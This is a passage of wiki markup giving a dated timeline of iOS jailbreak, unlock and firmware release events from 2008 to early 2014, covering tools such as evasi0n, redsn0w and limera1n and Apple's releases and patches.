* 11 January -- [[evad3rs]] releases [[evasi0n7]] 1.0.3 to fix [[iPad mini 2]] bootloop issues, support iOS 7.1 beta 3 and include [[Cydia]] 1.1.9.&lt;br /&gt;
&lt;br /&gt;
== 2013 ==&lt;br /&gt;
=== December ===&lt;br /&gt;
* 31 December -- [[evad3rs]] releases [[evasi0n7]] 1.0.2 to fix [[iPad 2]] bootloop issues.&lt;br /&gt;
* 30 December -- [[User:Ih8sn0w|iH8sn0w]], [https://twitter.com/SquiffyPwn SquiffyPwn], and [[User:winocm|winocm]] release [[p0sixspwn]], an [[untethered jailbreak]] for iOS 6.1.3 through 6.1.5, for Mac OS X.&lt;br /&gt;
* 24 December -- [[evad3rs]] releases [[evasi0n7]] 1.0.1 to completely remove Chinese piracy store.&lt;br /&gt;
* 22 December -- [[evad3rs]] releases [[evasi0n7]], an [[untethered jailbreak]] for iOS 7.0 through 7.0.4.&lt;br /&gt;
&lt;br /&gt;
=== November ===&lt;br /&gt;
* 14 November -- [[iOS]] 7.0.4, 6.1.5 for iPod touch (4th generation) to fix [[FaceTime]] bugs and [[List of Apple TVs|Apple TV]] 6.0.2 released.&lt;br /&gt;
* 1 November -- [[iPad Air]] released.&lt;br /&gt;
&lt;br /&gt;
=== October ===&lt;br /&gt;
* 24 October -- Apple TV firmware updated to 6.0.1.&lt;br /&gt;
* 22 October -- [[iOS]] 7.0.3 released to fix various bugs including a passcode bug. [[iPad Air]] and [[iPad mini 2]] announced.&lt;br /&gt;
&lt;br /&gt;
=== September ===&lt;br /&gt;
* 26 September -- [[iOS]] 7.0.2 released to address Lock screen issues.&lt;br /&gt;
* 23 September -- Apple releases a patched version of the Apple TV 6.0 update.&lt;br /&gt;
* 20 September -- Initial release of [[iPhone 5c]] and [[iPhone 5s]]. iOS 7.0.1 is also made available for these devices. A 6.0 update for the Apple TV was also released, but is pulled due to problems.[http://www.macrumors.com/2013/09/22/apple-pulls-apple-tv-6-0-update-following-reports-of-bricking/]&lt;br /&gt;
* 18 September -- [[iOS]] 7.0 released for the [[iPad 2]] and newer, [[iPad mini]], [[iPhone 4]] and newer, [[iPod touch (4th generation)]].&lt;br /&gt;
* 10 September -- Apple announces the [[iPhone 5c]] and [[iPhone 5s]].&lt;br /&gt;
&lt;br /&gt;
=== June ===&lt;br /&gt;
* 25 June -- [[iFaith]] 1.5.9 released.&lt;br /&gt;
* 19 June -- Apple TV firmware 5.3 released. &lt;br /&gt;
* 10 June -- Apple unveils a completely-revamped [[iOS]] 7 at [[WWDC]].&lt;br /&gt;
&lt;br /&gt;
=== May ===&lt;br /&gt;
* 30 May -- Apple quietly unveils a 16 GB version of the [[N78aAP|iPod touch (5th generation)]] that omits the rear camera, replacing the [[N81AP|iPod touch (4th generation)]].&lt;br /&gt;
* 2 May -- [[iOS]] 6.1.4 released for [[iPhone 5]].&lt;br /&gt;
&lt;br /&gt;
=== April ===&lt;br /&gt;
* 13 April -- [[iFaith]] updated to version 1.5.8.&lt;br /&gt;
* 11 April -- [[Sn0wbreeze]] updated to version 2.9.14.&lt;br /&gt;
* 10 April -- [[iFaith]] updated to version 1.5.7.&lt;br /&gt;
&lt;br /&gt;
=== March ===&lt;br /&gt;
* 10 March -- [[iFaith]] updated to version 1.5.6.&lt;br /&gt;
* 19 March -- Apple releases [[iOS]] 6.1.3 to patch multiple security-related bugs and improve Maps for Japanese users.&lt;br /&gt;
* 12 March -- [[evad3rs]] updated [[evasi0n]] to 1.5.3.&lt;br /&gt;
* 11 March --  [[evad3rs]] updated [[evasi0n]] to 1.5.2.&lt;br /&gt;
* 10 March -- [[iFaith]] updated to version 1.5.5.&lt;br /&gt;
* 5 March -- [[evad3rs]] updated [[evasi0n]] to 1.5.1.&lt;br /&gt;
&lt;br /&gt;
=== February ===&lt;br /&gt;
* 23 February -- [[iFaith]] updated to version 1.5.4.&lt;br /&gt;
* 23 February -- [[evad3rs]] updated [[evasi0n]] to 1.5. [[iFaith]] updated to version 1.5.3.&lt;br /&gt;
* 19 February -- Apple releases [[iOS]] 6.1.2 as a hotfix to address Exchange issues. [[Evasi0n]] was updated to support iOS 6.1.2 later the same day.&lt;br /&gt;
* 13 February -- [[Seas0nPass]] updated to support [[iOS]] 5.2 for the [[K66AP|Apple TV (2nd generation)]] [[untethered jailbreak]].&lt;br /&gt;
* 11 February -- Apple releases [[iOS]] 6.1.1 for the [[N94AP|iPhone 4s]] as a hotfix to address connectivity issues. [[evasi0n]] was updated to support [[iOS]] 6.1.1 later the same day.&lt;br /&gt;
* 4 February -- The [[evad3rs]] release [[evasi0n]] to [[jailbreak]] [[iOS]] 6.x.&lt;br /&gt;
&lt;br /&gt;
=== January ===&lt;br /&gt;
* 28 January -- Apple releases [[iOS]] 6.1.&lt;br /&gt;
&lt;br /&gt;
== 2012 ==&lt;br /&gt;
=== December ===&lt;br /&gt;
* 18 December -- Apple releases [[iOS]] 6.0.2 containing bug fixes for the [[iPhone 5]] and [[iPad mini]].&lt;br /&gt;
&lt;br /&gt;
=== November ===&lt;br /&gt;
* 30 November -- Apple releases [[iTunes]] 11.&lt;br /&gt;
* 12 November -- [[sn0wbreeze]] is updated to version 2.9.7.&lt;br /&gt;
* 2 November -- Inital release of [[iPad (4th generation)]] and [[iPad mini]] in first set of countries.&lt;br /&gt;
* 1 November -- Apple releases [[iOS]] 6.0.1.&lt;br /&gt;
&lt;br /&gt;
=== October ===&lt;br /&gt;
* 23 October -- Apple announces new [[iPad (4th generation)]] and [[iPad mini]].&lt;br /&gt;
* 14 October -- The [[iPhone Dev Team]] releases [[redsn0w]] 0.9.15b1, which lets A5(X) users with the appropriate [[SHSH]] blobs remain on, or update to, [[iOS]] 5.x.&lt;br /&gt;
&lt;br /&gt;
=== September ===&lt;br /&gt;
* 21 September -- Initial release of [[iPhone 5]] in first set of countries.&lt;br /&gt;
* 19 September -- Apple releases [[iOS]] 6.&lt;br /&gt;
* 12 September -- Apple announces new [[iPhone 5]] and release date of iOS 6.&lt;br /&gt;
&lt;br /&gt;
=== June ===&lt;br /&gt;
* 18 June -- [[iPhone Dev Team]] releases a new version of [[redsn0w]] (0.9.14b1), adding the capability to downgrade iPhone [[N82AP|3G]]/[[N88AP|3GS]] [[Baseband]] from the [[06.15.00]] iPad baseband to the latest unlockable iPhone baseband ([[05.13.04]]). This allows 3G/3GS users that had upgraded to the iPad baseband, thus losing the GPS function and the ability to restore to stock firmware, to get back to an iPhone baseband, making their devices behave as intended again, as well as being unlockable by [[ultrasn0w]].&lt;br /&gt;
* 14 June -- [[iPhone Dev Team]] releases a developer version of [[redsn0w]] (0.9.13dev1), which jailbreaks [[limera1n]] susceptible devices running [[iOS]] 6.0 beta. This version doesn't hacktivate nor install [[Cydia]], as it hasn't been ported to [[iOS]] 6 just yet. This jailbreak, however, installs afc2 and SSH, enabling developers to fix and prepare their apps to the next [[iOS]] version.&lt;br /&gt;
* 11 June -- Apple announces [[iOS]] 6 at [[WWDC]] 2012, and seeds the first beta to developers.&lt;br /&gt;
&lt;br /&gt;
=== May ===&lt;br /&gt;
* 25 May -- The [[Chronic Dev (team)|Chronic Dev Team]] releases [[Absinthe]] 2.0, providing an [[untethered jailbreak]] for all devices except the [[Apple TV]]s and [[K93AAP|iPad 2 (iPad2,4)]]. ([[Seas0nPass]] was also updated to include [[Absinthe]]'s [[untethered jailbreak|untether]] for the [[K66AP|Apple TV (2nd generation)]].)&lt;br /&gt;
* 7 May -- Apple releases [[iOS]] 5.1.1.&lt;br /&gt;
&lt;br /&gt;
=== March ===&lt;br /&gt;
* 7 March -- Apple releases [[iOS]] 5.1 and announces new devices: [[iPad (3rd generation)]], [[J33AP|Apple TV (3rd generation)]], and the [[K93AAP|iPad 2 (iPad2,4)]].&lt;br /&gt;
&lt;br /&gt;
=== January ===&lt;br /&gt;
* 20 January -- [[Absinthe]] was released to [[jailbreak]] and [[untethered jailbreak|untether]] the [[A5]] devices running [[iOS]] 5.0 and 5.0.1.&lt;br /&gt;
* 18 January -- Apple announces [[iBooks.app|iBooks version 2.0]].&lt;br /&gt;
&lt;br /&gt;
== 2011 ==&lt;br /&gt;
=== December ===&lt;br /&gt;
* 30 December -- [[User:pod2g|pod2g]]'s [[untethered jailbreak|untether]] for [[iOS]] 4.4.4 makes its way into a new version of [[Seas0nPass]] for [[K66AP|Apple TV (2nd generation)]] owners.&lt;br /&gt;
* 27 December -- [[User:pod2g|pod2g]]'s [[untethered jailbreak|untether]] for [[iOS]] 5.0.1 is released in new versions of [[PwnageTool]] and [[redsn0w]], and as a Cydia package called [[Corona]] (by the [[Chronic Dev (team)|Chronic Dev Team]]) for devices already jailbroken on 5.0.1.&lt;br /&gt;
* 15 December -- Apple releases [[iOS]] 4.4.4 for the [[K66AP|Apple TV (2nd generation)]], as well as a minor update (5.0.1 build 9A406) for the [[N94AP|iPhone 4s]] to address SIM card issues.&lt;br /&gt;
* 4 December -- [[iFaith]] 1.4 is released, which can circumvent the [[APTicket]] [[nonce]] on devices vulnerable to [[limera1n]]'s exploit.&lt;br /&gt;
&lt;br /&gt;
=== November ===&lt;br /&gt;
* 10 November -- [[iOS]] 5.0.1 is released in an attempt to fix battery-related issues. It's the first non-beta available as an [[OTA Updates|OTA update]].&lt;br /&gt;
&lt;br /&gt;
=== October ===&lt;br /&gt;
* 14 October -- The [[N94AP|iPhone 4s]] is officially released, although some preorders were delivered early.&lt;br /&gt;
* 12 October -- [[iOS]] 5.0 is released. The [[N94AP|iPhone 4s]] IPSW came with [[04.11.08]] due to a goof on Apple's side.&lt;br /&gt;
* 5 October -- Steve Jobs passes away.&lt;br /&gt;
* 4 October -- Apple announces the new [[N94AP|iPhone 4s]].&lt;br /&gt;
&lt;br /&gt;
=== September ===&lt;br /&gt;
* 19 September -- [[redsn0w]] 0.9.9 beta 1 is released, introducing a new UI and many features (like submitting [[SHSH]]s to the [[Cydia Server]].&lt;br /&gt;
* 17 September -- [[MyGreatFest]], first iCommunity and jailbreak centered convention was held.&lt;br /&gt;
&lt;br /&gt;
=== July ===&lt;br /&gt;
* 15 July -- Apple releases [[iOS]] 4.2.9 and 4.3.4, patching all jailbreaking-related vulnerabilities (aside from those in the [[bootrom]]).&lt;br /&gt;
* 6 July -- [[User:Comex|comex]] releases [[Saffron]], the first public [[jailbreak]] for the [[iPad 2]].&lt;br /&gt;
* 2 July -- A beta version of the upcoming [[jailbreak]] from [[User:comex|comex]] for the [[iPad 2]], making use of a PDF exploit, was leaked. A hotfix by Apple is expected very soon.&lt;br /&gt;
&lt;br /&gt;
=== June ===&lt;br /&gt;
* 1 June -- [[User:ih8sn0w|iH8sn0w]] releases [[iFaith]] to dump [[SHSH]] blobs from a device.&lt;br /&gt;
&lt;br /&gt;
=== May ===&lt;br /&gt;
* 6 May -- [[PwnageTool]], [[redsn0w]], and [[sn0wbreeze]] are updated for [[iOS]] 4.3.3 support (and in the case of sn0wbreeze, [[iOS]] 4.2.8 support as well).&lt;br /&gt;
* 3 May -- Apple releases [[iOS]] 4.2.8 and 4.3.3 to address the location-tracking controversy. Once more, current [[untethered jailbreak|untethering]] vulnerabilities remained unpatched.&lt;br /&gt;
&lt;br /&gt;
=== April ===&lt;br /&gt;
* 24 April -- [[PwnageTool]], [[redsn0w]], and [[sn0wbreeze]] are updated for [[iOS]] 4.3.2 support (and in the case of sn0wbreeze, [[iOS]] 4.2.7 support as well).&lt;br /&gt;
* 14 April -- Apple releases [[iOS]] 4.2.7 and 4.3.2 to fix security issues and connection issues for [[K95AP|iPad 2 (iPad2,3)]], but leaves [[untethered jailbreak|untethering]] vulnerabilities unpatched.&lt;br /&gt;
* 3 April -- All major jailbreak tools ([[redsn0w]], [[PwnageTool]], [[sn0wbreeze]]) get updated to includes [[i0n1c]]'s [[untethered jailbreak|untether]] code to jailbreak devices compatible with iOS 4.3.1 except the [[iPad 2]].&lt;br /&gt;
&lt;br /&gt;
=== March ===&lt;br /&gt;
* 25 March -- Apple releases iOS 4.3.1, properly blocking [[User:comex|comex]]'s [[IOSurface Kernel Exploit|exploit]].&lt;br /&gt;
* 13 March -- [[User:Comex|comex]] shows a remotely jailbroken [[K95AP|iPad 2 (iPad2,3)]].&lt;br /&gt;
* 11 March -- Release of the [[iPad 2]] in the USA. The exploits for [[limera1n]] ([[User:Geohot|geohot]]), [[SHA-1 Image Segment Overflow|SHAtter]] ([[User:posixninja|p0sixninja]]), and [[comex]]'s [[kernel]] exploit were closed by Apple.&lt;br /&gt;
* 9 March -- Apple releases [[iOS]] 4.3, fixing the [[HFS Legacy Volume Name Stack Buffer Overflow]] vulnerability.&lt;br /&gt;
&lt;br /&gt;
=== February ===&lt;br /&gt;
* 15 February -- New version of both [[PwnageTool]] and [[sn0wbreeze]] were released to support 4.2.1 and untethered using the [[feedface]] exploit.&lt;br /&gt;
* 7 February -- The [[Chronic Dev (team)|Chronic Dev Team]] release a version of [[greenpois0n (jailbreak)|greenpois0n]] to jailbreak the [[N92AP|iPhone 4 (iPhone3,3)]], using the [[HFS Legacy Volume Name Stack Buffer Overflow]].&lt;br /&gt;
* 3 February -- [[User:Jaywalker|Jaywalker]] of the [[Chronic Dev (team)|Chronic Dev Team]] posts [https://www.youtube.com/watch?v=T3NYPVT13xw a video] of custom boot using a soon to be released version of [[Greenpois0n (jailbreak)|greenpois0n]].&lt;br /&gt;
&lt;br /&gt;
=== January ===&lt;br /&gt;
* 12 January -- Apple discontinues [[iOS]] support for [[N82AP|iPhone 3G]] and [[N72AP|iPod touch (2nd generation)]] since today's beta release of [[iOS]] 4.3. Also first time a beta [[iOS]] for [[K66AP|Apple TV (2nd generation)]] is released.&lt;br /&gt;
* 11 January -- Verizon announces [[N92AP|iPhone 4 (iPhone3,3)]].&lt;br /&gt;
&lt;br /&gt;
== 2010 ==&lt;br /&gt;
=== November ===&lt;br /&gt;
* 28 November -- [[ultrasn0w]] 1.2 is released by the [[iPhone Dev Team]] to unlock [[N82AP|iPhone 3G]] and [[N88AP|iPhone 3GS]] on baseband 6.15.00&lt;br /&gt;
* 22 November -- Apple releases [[iOS]] 4.2.1 (respectively 4.2 for [[K66AP|Apple TV (2nd generation)]])&lt;br /&gt;
&lt;br /&gt;
=== October ===&lt;br /&gt;
* 31 October -- The [[iPhone Dev Team|Dev Team]] releases [[redsn0w]] 0.9.6b2 which jailbreaks [[iOS]] 4.1, 4.2 and 3.2.2 on every device available at the time of release (except for iPod touch (2nd generation) MC). It also includes &amp;quot;DFU&amp;quot; button allowing to flash custom [[IPSW]] from Windows [http://blog.iphone-dev.org/post/1452044444/redsn0w-limera1n-fun (see blog post)].&lt;br /&gt;
* 20 October -- The [[iPhone Dev Team|Dev Team]] releases [[PwnageTool]] 4.1 which jailbreaks [[iOS]] 4.1 and 3.2.2 on every device  available at the time of release. [http://blog.iphone-dev.org/post/1359246784/20102010-event (see blog post)]&lt;br /&gt;
* 18 October -- [[Chronic Dev (team)|Chronic Dev Team]] releases [[Greenpois0n (jailbreak)|greenpois0n]] RC4 which added support for iPod touch (2nd generation) (MC and MB) for an untethered jailbreak using [[User:comex|comex]]'s kernel exploit and the [[usb_control_msg(0xA1, 1) Exploit]].&lt;br /&gt;
* 12 October -- [[Chronic Dev (team)|Chronic Dev Team]] releases [[Greenpois0n (jailbreak)|greenpois0n]] after switching its exploit from [[SHA-1 Image Segment Overflow|SHAtter]] to [[limera1n]], in the hope that [[SHA-1 Image Segment Overflow|SHAtter]] remains for 5th generation devices. (The exploit [[limera1n]] uses was fixed in the [[iBoot (Bootloader)|iBoot]] revision found in [[iOS]] 4.2 beta 2, which means Apple knows about the vulnerability and the next [[bootrom]] revision may have it patched.)&lt;br /&gt;
* 10 October -- Following the first [[limera1n]] beta release, [[User:geohot|geohot]] released multiple versions, each fixing bugs affecting previous releases. [[Chronic Dev (team)|Chronic Dev Team]] officialy anounces that, in order to keep [[SHA-1 Image Segment Overflow|SHAtter]] undisclosed and possibly preserve it for 5th generation devices, [[Greenpois0n (jailbreak)|greenpois0n]] would be delayed in order to incorporate this new exploit [[limera1n]] uses.&lt;br /&gt;
* 9 October -- In order to push [[Chronic Dev (team)|Chronic Dev Team]] to change the exploit used on [[Greenpois0n (jailbreak)|greenpois0n]], [[User:geohot|geohot]] rushed out a beta version of [[limera1n]].&lt;br /&gt;
* 8 October -- [[User:Geohot|Geohot]] comes back to the scene with a new [[bootrom]] exploit believed to work on all devices, as shown on the resurrected [http://www.limera1n.com limera1n web site]. He prompts [[Chronic_Dev_(team)|Chronic Dev Team]] to use his exploit instead of [[SHA-1 Image Segment Overflow|SHAtter]], but, since [[Greenpois0n (jailbreak)|greenpois0n]] is already scheduled to October 10, it may be not possible. [[User:Geohot|Geohot]] ETA'd his [[limera1n]] release to October 11, if [[Greenpois0n (jailbreak)|greenpois0n]] can't be changed to use this new exploit. This decision, however, would burn 2 [[bootrom]] exploits: [[SHA-1 Image Segment Overflow|SHAtter]] itself and the one used by [[limera1n]], which is unpatchable by firmware updates.&lt;br /&gt;
* 6 October -- Chronic Dev Team issues expected ETA of [[Greenpois0n (jailbreak)|greenpois0n]] as October 10, featuring the new [[SHA-1 Image Segment Overflow|SHAtter]] exploit for devices with the [[S5L8930]].&lt;br /&gt;
&lt;br /&gt;
=== September ===&lt;br /&gt;
* 30 September -- [[User:MuscleNerd|MuscleNerd]] of the [[iPhone Dev Team]] posts [http://www.youtube.com/watch?v=adVp-IxcDHI the first video] of an [[K66AP|Apple TV (2nd generation)]] jailbroken via [[SHA-1 Image Segment Overflow|SHAtter]].&lt;br /&gt;
* 27 September -- [[User:MuscleNerd|MuscleNerd]] of the [[iPhone Dev Team]] posts [http://www.youtube.com/watch?v=aoX1Q8ym2J8 the first video] of an [[N81AP|iPod touch (4th generation)]] jailbroken via [[SHA-1 Image Segment Overflow|SHAtter]].&lt;br /&gt;
* 20 September -- [[User:pod2g|pod2g]] discloses details about the [[usb_control_msg(0xA1, 1) Exploit‎]] here at The iPhone Wiki. It was used in [[redsn0w]] the following day.&lt;br /&gt;
* 9 September -- The existence of [[SHA-1 Image Segment Overflow|SHAtter]] is revealed. Further details were not released, however.&lt;br /&gt;
* 8 September -- Apple releases the [[N81AP|iPod touch (4th generation)]], and iOS 4.1, closing the [[AT+XAPP Vulnerability]].&lt;br /&gt;
* 1 September -- Apple event. They announced the new [[N81AP|iPod touch (4th generation)]], [[K66AP|Apple TV (2nd generation)]], iOS 4.1, and [[iTunes]] 10.&lt;br /&gt;
&lt;br /&gt;
=== August ===&lt;br /&gt;
* 12 August -- [[Saurik]] releases the first version of PDF Patcher, which installs Apple's patch for the FreeType vulnerability (used in conjunction with other exploits by [[Star]]). It works on firmwares as far back as 2.x, and renders [[iOS]] 3.2.2 and 4.0.2 useless for jailbreakers. Jailbreaking and installing this patch is currently the only way for users of first generation iPod touches and iPhones to protect themselves against malicious use of the exploit.&lt;br /&gt;
* 11 August -- Apple releases [[iOS]] 4.0.2 for [[List of iPhones|iPhone]]/[[List of iPod touches|iPod touch]] and [[iOS|iPhone OS]] 3.2.2 for [[K48AP|iPad]] as a hotfix for [[Star]]'s exploits. [[Ultrasn0w]]'s exploit remains, since there's no [[Baseband Firmware|baseband]] update on those versions.&lt;br /&gt;
* 3 August -- Just before midnight in [[User:planetbeing|planetbeing]]'s timezone [[ultrasn0w]] has been released by the [[iPhone Dev Team]] to [[unlock]] the [[N90AP|iPhone 4]].&lt;br /&gt;
* 1 August -- [[User:Comex|comex]] releases [[Star]], a [[jailbreak]] for all iDevices with [[iOS|iPhone OS]] 3.1.2 through [[iOS]] 4.0.1.&lt;br /&gt;
&lt;br /&gt;
=== July ===&lt;br /&gt;
* 30 July -- [[N90AP|iPhone 4]] is released in major countries (second wave).&lt;br /&gt;
* 26 July -- Jailbreaking is now officially legal in the U.S.A.: [http://www.eff.org/press/archives/2010/07/26 EFF Wins New Legal Protections for Cell Phone Jailbreakers and Unlockers]&lt;br /&gt;
* 15 July -- Apple releases [[iOS|iPhone OS]] 3.2.1 and [[iOS]] 4.0.1.&lt;br /&gt;
&lt;br /&gt;
=== June ===&lt;br /&gt;
* 24 June -- [[N90AP|iPhone 4]] is launched.&lt;br /&gt;
* 22 June -- [[iPhone Dev Team]] releases [[PwnageTool]] 4.0 and later 4.0.1 for all devices on 4.0 except those with newer [[bootrom]]s (some [[N72AP|iPod touch (2nd generation)]] and [[N88AP|iPhone 3GS]] devices, and all [[N18AP|iPod touch (3rd generation)]] and newer devices).&lt;br /&gt;
* 21 June -- [[iPhone Dev Team]] releases [[redsn0w]] 0.9.5 to [[jailbreak]] 4.0 on [[N82AP|iPhone 3G]] and [[N72AP|iPhone touch (2nd generation)]] ([[Bootrom 240.4|old bootrom]]), [[iPhone Dev Team]] releases [[ultrasn0w]] 0.93, an unlock for baseband firmwares [[04.26.08]], [[05.11.07]], [[05.12.01]], and [[05.13.04]] and Apple releases [[iOS]] 4.0&lt;br /&gt;
* 19 June -- [[User:Geohot|geohot]] holds a speech at the [[Nuit du hack 2010|Nuit du Hack]]&lt;br /&gt;
&lt;br /&gt;
=== May ===&lt;br /&gt;
* 3 May -- Windows version of [[Spirit]] has been updated to not require Windows 98 compatibility mode to run and fixed a photo deletion issue.&lt;br /&gt;
* 2 May -- [[User:Comex|comex]] releases [[Spirit]], an [[untethered jailbreak]] for all iDevices with [[iOS|iPhone OS]] 3.1.2 through 3.2.&lt;br /&gt;
&lt;br /&gt;
=== April ===&lt;br /&gt;
* 3 April -- Apple releases the [[K48AP|iPad]].&lt;br /&gt;
&lt;br /&gt;
=== February ===&lt;br /&gt;
* 12 February -- [[User:sherif hashim|sherif_hashim]] discovers [[AT+XAPP Vulnerability]] and passes it to [[User:MuscleNerd|MuscleNerd]], an elite member of the [[iPhone Dev Team]]&lt;br /&gt;
* 2 February -- Apple releases [[iOS|iPhone OS]] 3.1.3, closing [[usb_control_msg(0x21, 2) Exploit|usb_control_msg(0x21, 2)]] vulnerability used by [[blackra1n]], [[redsn0w]], et. al.&lt;br /&gt;
&lt;br /&gt;
== 2009 ==&lt;br /&gt;
=== November ===&lt;br /&gt;
* 3 November -- [[User:Geohot|geohot]] releases [[blackra1n]] RC3, a software jailbreak for all devices. Includes a new unlock for baseband [[05.11.07]] called [[blacksn0w]] and is also noticeably faster than previous versions.&lt;br /&gt;
&lt;br /&gt;
=== October ===&lt;br /&gt;
* 11 October -- [[User:Geohot|geohot]] releases [[blackra1n]] RC1, a 30 second software jailbreak for all devices, including a [[tethered jailbreak]] for the [[N18AP|iPod touch (3rd generation)]], and [[N88AP|iPhone 3GS]] and [[N72AP|iPod touch (2nd generation)]] units with newer bootrom revisions.&lt;br /&gt;
&lt;br /&gt;
=== September ===&lt;br /&gt;
* 24 September -- [[User:iH8sn0w|iH8sn0w]] discovers the [[AT+XEMN Heap Overflow|AT+XEMN]] crash independently.&lt;br /&gt;
* 9 September -- The [[N18AP|iPod touch (3rd generation)]] with [[S5L8922]] processor is released. [[N72AP|iPod touch (2nd generation)]] and [[N88AP|iPhone 3GS]] units continue shipping, but with a new bootrom ([[Bootrom 240.5.1|240.5.1]] and [[Bootrom 359.3.2|359.3.2]] respectively) that is no longer vulnerable to the [[0x24000 Segment Overflow]].&lt;br /&gt;
* 9 September -- Apple releases [[iOS|iPhone OS]] 3.1 (7C144) for iPhones and 3.1.1 (7C145) for iPod touches, closing the [[iBoot Environment Variable Overflow]] and [[AT+XLOG Vulnerability|AT+XLOG]] + [[AT+FNS]] Baseband Exploits.&lt;br /&gt;
&lt;br /&gt;
=== July ===&lt;br /&gt;
* 14 July -- [[User:Geohot|geohot]] releases [[purplesn0w]], a software unlock for the [[X-Gold 608]] using [[AT+XLOG Vulnerability|the same exploit as ultrasn0w]], but handled differently. Minutes later, an explanation and source code was posted.&lt;br /&gt;
* 7 July -- The [[iPhone Dev Team]] updates [[redsn0w]] and [[ultrasn0w]] to version 0.8, now with [[N88AP|iPhone 3GS]] support. Saurik also updates [[WinterBoard]] to support the [[N88AP|iPhone 3GS]].&lt;br /&gt;
* 3 July -- [[User:Geohot|geohot]] releases [[purplera1n]], a software [[jailbreak]] for the [[N88AP|iPhone 3GS]].&lt;br /&gt;
&lt;br /&gt;
=== June ===&lt;br /&gt;
* 28 June -- [[User:Geohot|geohot]] posts pictures on his blog of the first fully jailbroken [[N88AP|iPhone 3GS]].&lt;br /&gt;
* 25 June -- It's discovered that [[N88AP|iPhone 3GS]] is vulnerable to the [[0x24000 Segment Overflow]].&lt;br /&gt;
* 24 June -- The [[iPhone Dev Team]] releases [[ultrasn0w]], an [[unlock]] for [[X-Gold 608]] thanks to [[AT+XLOG Vulnerability|a new exploit]] discovered by [[User:Oranav|Oranav]].&lt;br /&gt;
* 23 June -- [[User:Geohot|geohot]] announces he's found a new exploit in [[iBoot (Bootloader)|iBoot]] he calls [[purplera1n]].&lt;br /&gt;
* 19 June -- Release of [[N88AP|iPhone 3GS]] to the public and the release of [[PwnageTool]] 3.0 and [[redsn0w]] for jailbreaking devices running [[iOS|iPhone OS]] 3.0&lt;br /&gt;
* 17 June -- Apple releases [[iOS|iPhone OS]] 3.0.&lt;br /&gt;
* 8 June -- Apple announces the [[N88AP|iPhone 3GS]].&lt;br /&gt;
&lt;br /&gt;
=== March ===&lt;br /&gt;
* 10 March -- Information about the [[0x24000 Segment Overflow]] exploit used for the [[N72AP|iPod touch (2nd generation)]] [[untethered jailbreak]] is released thanks to the combined work of [[chronic]], [[CPICH]], [[User:Posixninja|posixninja]], [[User:Pod2g|pod2g]], [[ius]], [[planetbeing]], [[User:MuscleNerd|MuscleNerd]], and co. after being leaked and sold by [[NitroKey]]. To prevent users wasting their money on a stolen exploit, the Hybrid DevTeam decided to release it immediately.&lt;br /&gt;
&lt;br /&gt;
=== January ===&lt;br /&gt;
* 31 January -- The [[iPhone Dev Team]] released [[redsn0w Lite]], a [[tethered jailbreak|tethered]] [[N72AP|iPod touch (2nd generation)]] [[jailbreak]]. It combines the [[ARM7 Go]] vulnerability with the well-established [[pwnage]] flow for other Apple mobile devices. It was bundled in a way that allowed usage on [[iOS|iPhone OS]] 2.2.1 by uploading [[iBoot (Bootloader)|iBoot]] from [[iOS|iPhone OS]] 2.1.1, which is vulnerable to [[ARM7 Go]], to the device while in [[DFU Mode]].&lt;br /&gt;
* 29 January -- Apple releases [[iOS|iPhone OS]] 2.2.1, closing the [[AT+stkprof]] exploit.&lt;br /&gt;
* 25 January -- [[0wnboot]] is released to [http://code.google.com/p/chronicdev/ chronicdev google code page], thanks to [[AriX]], [[User:ChronicDev|chronic]], [[CPICH]], [[westbaer]], [[ius]], [[User:Pod2g|pod2g]], the rest of the iPod devel crew on IRC, and to the #iphone-hax lab rats. Within days, [[AriX]] and the [[Chronic Dev (team)|Chronic Dev Team]] got a ramdisk booting for a [[tethered jailbreak]].&lt;br /&gt;
* 17 January -- [[User:MuscleNerd|MuscleNerd]] of the [[iPhone Dev Team]] [https://twitter.com/MuscleNerd/status/1127346766 shows a video demo] of the first jailbroken [[N72AP|iPod touch (2nd generation)]].&lt;br /&gt;
* 16 January -- [[ARM7 Go]] vulnerability disclosed where else but here on The iPhone Wiki, for developers to poke and prod at.&lt;br /&gt;
* 15 January -- The [[iPhone Dev Team]] [https://twitter.com/iphone_dev/status/1120595069 tweets the VFDecrypt key] for [[iOS|iPhone OS]] 2.2 on [[N72AP|iPod touch (2nd generation)]], demonstrating for the first time that unsigned code can now be run on that device.&lt;br /&gt;
* 1 January -- The [[iPhone Dev Team]] releases [[yellowsn0w]] 0.9 beta for baseband [[02.28.00]].&lt;br /&gt;
&lt;br /&gt;
== 2008 ==&lt;br /&gt;
=== December ===&lt;br /&gt;
* 27 December -- [[25C3 presentation &amp;quot;Hacking the iPhone&amp;quot;]]&lt;br /&gt;
* 21 December -- [[User:MuscleNerd|MuscleNerd]], of the [[iPhone Dev Team]] does a live demo of the 3G unlock, dubbed as [[yellowsn0w]]: http://qik.com/video/729275&lt;br /&gt;
&lt;br /&gt;
=== November ===&lt;br /&gt;
* 21 November -- Apple releases [[iOS|iPhone OS]] 2.2.&lt;br /&gt;
&lt;br /&gt;
=== September ===&lt;br /&gt;
* 9 September -- Apple releases [[iOS|iPhone OS]] 2.1. [[N72AP|iPod touch (2nd generation)]], which no longer had the [[Pwnage 2.0]] exploit, is revealed.&lt;br /&gt;
&lt;br /&gt;
=== August ===&lt;br /&gt;
* 18 August -- Apple releases [[iOS|iPhone OS]] 2.0.2. [[iPhone Dev Team]] releases [http://wikee.iphwn.org/news:pwnage20announcement QuickPwn], a 2.x [[pwnage]]/ramdisk combination exploit that allows jailbreaking without needing to create custom IPSWs.&lt;br /&gt;
* 4 August -- Apple releases [[iOS|iPhone OS]] 2.0.1.&lt;br /&gt;
&lt;br /&gt;
=== July ===&lt;br /&gt;
* 22 July -- [[TA_Mobile]] hardware dumps the 3G baseband (bootloader 5.8 &amp;amp; FW 1.45.00) by desoldering the [[NOR]].&lt;br /&gt;
* 19 July -- [[iPhone Dev Team]] releases [[PwnageTool]] 2.0, jailbreaking and unlocking the 2.0 software on the [[M68AP|iPhone]] and jailbreaking [[iOS|iPhone OS]] 2.0 on the [[N82AP|iPhone 3G]] and [[N45AP|iPod touch]].&lt;br /&gt;
* 15 July -- Apple releases [[iOS|iPhone OS]] 1.1.5 for the [[N45AP|iPod touch]].&lt;br /&gt;
* 11 July -- [[N82AP|iPhone 3G]] is released. Apple also releases [[iOS|iPhone OS]] 2.0 and MobileMe on the same date, resulting in server issues.&lt;br /&gt;
&lt;br /&gt;
=== June ===&lt;br /&gt;
* 9 June - [[N82AP|iPhone 3G]] is announced at [[WWDC]] '08.&lt;br /&gt;
&lt;br /&gt;
=== April ===&lt;br /&gt;
